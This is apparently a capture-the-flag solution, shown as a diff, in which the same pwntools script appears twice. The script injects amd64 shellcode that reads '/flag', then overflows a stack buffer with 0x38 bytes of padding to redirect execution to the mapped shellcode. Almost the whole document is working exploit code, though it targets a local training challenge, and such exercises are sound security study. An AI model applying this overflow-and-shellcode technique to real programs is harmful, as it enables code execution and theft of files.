morkev · February 18, 2025 09:01
diff --git a/binary_exploitation_hijack_to_mmap_shellcode.py b/binary_exploitation_hijack_to_mmap_shellcode.py
 from pwn import *

 # Modified shellcode to use absolute path to flag
 shellcode = asm('''
    /* Open flag file */
    mov rax, 2          /* SYS_open */
    lea rdi, [rip+flag] /* filename */
    xor rsi, rsi        /* O_RDONLY */
    syscall
    
    /* Read flag content */
    mov rdi, rax        /* fd */
    mov rax, 0          /* SYS_read */
    sub rsp, 100        /* buffer space */
    mov rsi, rsp        /* buffer */
    mov rdx, 100        /* count */
    syscall
    
    /* Write to stdout */
    mov rdx, rax        /* count */
    mov rax, 1          /* SYS_write */
    mov rdi, 1          /* stdout */
    mov rsi, rsp        /* buffer */
    syscall
    
    /* Exit cleanly */
    mov rax, 60         /* SYS_exit */
    xor rdi, rdi        /* status = 0 */
    syscall

 flag:
    .string "/flag"    # Absolute path
 ''', arch='amd64')

 p = process('/challenge/binary-exploitation-hijack-to-mmap-shellcode-w')

 p.send(shellcode)
 p.recvuntil(b'Press enter to continue!')
 p.sendline()

 # From the stack dump I received:
 # - Buffer starts at rsp+0x20
 # - Return address is at 0x7fff539fd8c8
 # - Buffer starts at 0x7fff539fd890
 # - So offset is 0x38 bytes (0x8c8 - 0x890 = 0x38)
 payload = b'A' * 0x38       # Padding to return address
 payload += p64(0x2a55b000)  # Address where shellcode is mapped

 p.sendline(payload)
 print(p.recvall().decode())
	from pwn import *

	# Modified shellcode to use absolute path to flag
	shellcode = asm('''
	/* Open flag file */
	mov rax, 2 /* SYS_open */
	lea rdi, [rip+flag] /* filename */
	xor rsi, rsi /* O_RDONLY */
	syscall

	/* Read flag content */
	mov rdi, rax /* fd */
	mov rax, 0 /* SYS_read */
	sub rsp, 100 /* buffer space */
	mov rsi, rsp /* buffer */
	mov rdx, 100 /* count */
	syscall

	/* Write to stdout */
	mov rdx, rax /* count */
	mov rax, 1 /* SYS_write */
	mov rdi, 1 /* stdout */
	mov rsi, rsp /* buffer */
	syscall

	/* Exit cleanly */
	mov rax, 60 /* SYS_exit */
	xor rdi, rdi /* status = 0 */
	syscall

	flag:
	.string "/flag" # Absolute path
	''', arch='amd64')

	p = process('/challenge/binary-exploitation-hijack-to-mmap-shellcode-w')

	p.send(shellcode)
	p.recvuntil(b'Press enter to continue!')
	p.sendline()

	# From the stack dump I received:
	# - Buffer starts at rsp+0x20
	# - Return address is at 0x7fff539fd8c8
	# - Buffer starts at 0x7fff539fd890
	# - So offset is 0x38 bytes (0x8c8 - 0x890 = 0x38)
	payload = b'A' * 0x38 # Padding to return address
	payload += p64(0x2a55b000) # Address where shellcode is mapped

	p.sendline(payload)
	print(p.recvall().decode())